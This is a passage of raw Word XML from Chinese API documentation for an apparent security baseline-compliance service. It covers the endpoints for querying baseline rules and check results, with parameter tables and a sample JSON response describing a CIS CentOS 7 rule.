          <w:p w14:paraId="612FAA53" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="48FE3491" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DDB4AC3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30CFCD91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F0E0C64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B336927" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="184" w:name="查询基线规则"/>
      <w:bookmarkEnd w:id="183"/>
      <w:r>
        <w:t>查询基线规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E55EC23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2150D4EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/baseline/spec/rule/{linux，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35057C9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>ps：检查项数据较多，最终汇总的数据量较大，接口性能受影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8A57D2"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44"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3792"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1698EAE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C57E364" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22BB2D79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01CC5300" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="794EFC8A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0377CFAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2666D5B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5221E4AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作系统，必填 1 linux 2 windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4848204B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="663B3AB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09482645" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>inti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FF0E9DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>基线类别，必填 1 系统基线 2 应用基线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6C1AE113" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="120BBDC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="677B6D27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05175B6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>使用系统， 系统基线时过滤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1BD91A5F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E39817F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>appId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F29DF0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="645E9724" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用id， 应用基线时过滤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72D55D44" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E67E0BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "osType": 1,  //操作系统，必填 1 linux 2 windows</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "family": 1,  //基线类别，必填 1 系统基线 2 应用基线</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "plaform": "ubuntu-16.04", //使用系统， 系统基线时过滤</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "appId": "6871696328758afa" //应用id， 应用基线时过滤</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7225367B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A7F0B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "id":"5fba7c27fc524b1a0831",    // 规则id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "userRule":false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name":"CIS Centos 7 Level 2",    // 规则名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "osTag":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "centos-7"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],    // 适用平台</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "appName":null,    // 适用应用-应用名：应用基线规则</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "appVersion":null,   // 适用应用-应用版本集：应用基线规则</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "family": 1, //基线类别，必填 1 系统基线 2 应用基线</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "appRule":false,    // 是否应用基线</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "needAuthCount":0,    // 应用基线需要授权的检查项</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "checkTotal":10,    // 基线规则包含的检查项条数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "id" : "0c1a041e6a24b10b3683",  //检查项ID</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "name" : "检查/etc/passwd 中的所有组在 /etc/group是否存在",  //检查项名称</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "category" : "用户和组设置",  //类别</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                "description" : "随着时间的推移，系统管理错误和更改可能导致组在 /etc/passwd 中但不在 /etc/group 中定义。",  //描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "content" : "/etc/passwd 中的所有组在 /etc/group都应存在",  //内容</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "reference" : "",  //引用信息</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "needAuth" : false //是否需要授权</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCA62D6"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702"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3792"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0CABFDA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83E9B16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74D071D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BABE638" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="371479CF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D2E2377" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E13707C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3ACF203C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2244F57A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2791D623" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>userRule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20D0D1B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0608FFAB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否是用户规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E0C9212" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A89FF32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B0FEBA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CCFE18D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E83C570" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="734CB10D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osTag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60312AF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59495D0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>适用平台</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3EAE57F1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="503A5458" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>appName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68C29B25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CC6B8DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>适用应用-应用名：应用基线规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2F03ACF5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41707CBC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>appVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="136E1D61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0269C6FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>适用应用-应用版本集：应用基线规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2D17D144" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B0EECB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="469B7AA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55BC1FAB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>基线类别，必填 1 系统基线 2 应用基线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2BC08A88" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05C3F7FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>appRule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A0DA064" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07CF035C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否应用基线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="17456E59" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="148F6065" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>needAuthCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B71C620" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36CAA5BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用基线需要授权的检查项</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E8BA36B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DA71DA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>checkTotal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F288666" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00B8D9E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>基线规则包含的检查项条数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4129026C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E09246D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FC745C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3ACC0D5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查项明细</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D4EC312" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="185" w:name="查询检查结果"/>
      <w:bookmarkEnd w:id="184"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>查询检查结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319E8193" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DDBDCB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/baseline/spec/checkResult/{linux，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC6E2F8"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173"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1786"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="64190AF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1FE3636" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00728199" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43E2851A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="15F82D46" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FC686D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
